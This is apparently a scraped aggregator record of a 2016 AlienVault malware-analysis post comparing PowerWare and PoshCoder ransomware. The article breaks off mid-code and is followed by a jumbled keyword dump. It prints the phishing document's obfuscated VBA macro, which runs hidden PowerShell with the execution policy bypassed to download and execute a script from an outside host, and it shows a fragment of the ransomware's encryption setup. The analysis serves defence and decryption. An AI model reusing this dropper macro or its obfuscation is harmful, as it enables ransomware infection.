One Article Review
| Source |  AlienVault Lab Blog |
|---|---|
| Identifiant | 57 |
| Date de publication | 2016-04-04 13:00:00 (vue: 2016-04-04 13:00:00) |
| Titre | PowerWare or PoshCoder? Comparison and Decryption |
| Texte | PowerWare was brought to my attention by Carbon Black via their blog post. PowerWare is downloaded by a malicious macro-enabled Microsoft Word document that is distributed via a phishing email campaign. The malicious document in question attempts to convince the user to enable macros by informing them that the file is protected by Microsoft Office. This, of course, is a farce. Once the macro is enabled, the PowerWare payload will be downloaded and executed. PowerWare, unfortunately, is hitting healthcare providers. Figure 1: Screenshot of the macro-enabled malicious Microsoft Word document tricking the user into enabling macrosUsing olevba.py from oletools, we can extract the macro from the aforementioned document for analysis.Private Sub Document_Open()
Dim CGJKIYRSDGHJHGFFG As String
CGJKIYRSDGHJHGFFG = "cmd /K " + "pow" + "eR" & "sh" + "ell.e" + "x" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://skycpa[.]in/file.php','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1"
Shell CGJKIYRSDGHJHGFFG, 0
MsgBox ("Unreferenced library required")
End SubFrom the output above, we can see when enabled, the macro intends to run this PowerShell command:"cmd /K " + "pow" + "eR" & "sh" + "ell.e" + "x" + "e -WindowStyle hiddeN -ExecuTionPolicy BypasS -noprofile (New-Object System.Net.WebClient).DownloadFile('http://skycpa.in/file[.]php','%TEMP%\Y.ps1'); poWerShEll.exe -WindowStyle hiddeN -ExecutionPolicy Bypass -noprofile -file %TEMP%\Y.ps1”It employs use of “cmd” to launch “Powershell.exe,” because on some systems, calling the executable directly is blocked. The command also includes some minor obfuscation, such as splitting PowerShell.exe into bit sized chunks and mixing upper and lower case. In addition, the command attempts to bypass the Execution Policy and not use any profiles the system may have set to be used by default. It then downloads the payload form syscpa[.]in to a temporary directory as Y.ps1 and then executes it.PowerWare based on PoshCoderUpon examination of the PowerShell file that was downloaded, you may notice that the programming logic looks familiar. PowerWare seems to be heavily based on PoshCoder, the ransomware that rose to infamy due to the fact it destroyed encrypted data using a logic based programming flaw. The programming style and flow is similar enough that some may even argue that it's a variant of PoshCoder and not a totally new PowerShell ransomware family. The following are some of their major similarities:1. Both incorporate the use of the RijndaelManaged class. The use of that class itself is not uncommon. However, if you examine the usage of the class, you will notice that the two are quite similar from the key initialization to the padding and mode choice. The exception is their Initialization vector (IV).Excerpt from PoshCoder Sample$XlowQsiRsKORgfR = new-Object System.Security.Cryptography.RijndaelManaged
$XlowQsiRsKORgfR.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $BchjdRgasjcThsjd, $UxjcRgasjfvRsj, 5).GetBytes(32)
$XlowQsiRsKORgfR.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("XlowQsiRsKORgfRjBMPLm |
| Notes | |
| Envoyé | Oui |
| Condensat | $73848hhjhdrghx67hhsh $bchjdrgasjcthsjd $binreader $data $external $false $filename $gbcswhjkiyrdvhh $hgjhbvsryujnbgdrhj $home $memstream $post $rijndael $salt $string1 $string2 $the $uxjcrgasjfvrsj $vghkjjgferhjjgsdqwd $xcjhedijgdfjmvd $73848hhjhdrghx67hhsh $bnx8khahs3hjx96 $rijndael $sgkpotthjmnfdryjkj $sqegjjyrfbnhffhj $xlowqsirskorgfr $rijndael $salt $binreader $binwriter $data dim end shell try $binwriter $cryptostream $memstream $the $binreader write if write 'http://skycpa &string2= &uuid= “powershell 0 msgbox 122 2048 2048 42871 42872 42880 451 4564d49eda7a048f301b1f87f9da3c62; ::ascii ::open ::read ::readwrite ::utf8 = new above activity; add addition aes aforementioned alienvault alle also amf analysis analyzed:4564d49eda7a048f301b1f87f9da3c62 another any appears application/x are argue argument array aspx assist attempts attention bad base64 based basestream because being below:alert below:poshcoder below:to binaryreader binarywriter bit black blocked blog body; both boundary broke brought but bypass bytes calling campaign can cannot capability capture carbon case cbc cgjkiyrsdghjhgffg char checkin choice chunks class classtype:trojan clear client close cmd cmdlet cnc codebases com/en command command: communication comobject comparison completely computehash connection contain content content: converted convince copies count course create createdecryptor cryptography cryptostream data debuggers decipherable decoded decrypt decrypting decryption decryptor default destroyed did difference differences directly directory distributed document doesn’t downloaded downloadfile downloads due during each earlier easily efforts ell email employs empty enable enabled enabling encoded encoding encrypt encrypted encryption enough enter entered even exact examination examine exception excerpt exe executable executed executes execution executionpolicy extract fact familiar family farce featured features figure file fileaccess filemode filename files fileshare finding first five flaw flow flow:established following form found from generate generated get getbytes hand hardcoded have header; healthcare heavily hidden hitting hopefully host however http https://technet in/file include includes incorporate indicates infamy informing initialization input intends is: issue issues it's itself join key larger launch length length less level library lists logic looks lower luckily macro macros macrosusing made major makes malicious may memorystream $cryptostream mentioned method; microsoft minor mixing mode mode= more most msg: msxml2 need needed net network new next nids nocase; noprofile not notice null number obfuscation object office oletools olevba once one only ontent open other out output overwritten padded padding padding= param password payload phishing php php' plain please policy poshcoder poshcoder/poshkoder9fe45fc4c402932248cd2c26b65f883d poshcoder/poshkoderbe03eb109cab04a1a70b5bbc7b22949e poshcoder/poshkoderconclusionpowerware poshcoder/poshkoderd09cef5f16b1e5813a25fef43474ac96 poshcoderupon post pow powershell powerware powerware$gbcswhjkiyrdvhh powerware/poshcoder powerware627e107a62bdf541ffcfaa045fe9ba32 powerwareas powerwarebnx8khahs3hjx96 private process profiles programming proper properly protected providers ps1 ps1' ps1”it qtiq question quite random randomly ransomware reach read readbytes reasons recoverable recovered reference:md5 remote request required research researchers rev:1; rfc2898derivebytes rijndaelmanaged rijndaelmanaged $bnx8khahs3hjx96 rijndaelmanaged $rijndael rijndaelmanaged $xlowqsirskorgfr rose rule run said salt sample$xlowqsirskorgfr samples screenshot script security see seem se |
| Tags | |
| Stories | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.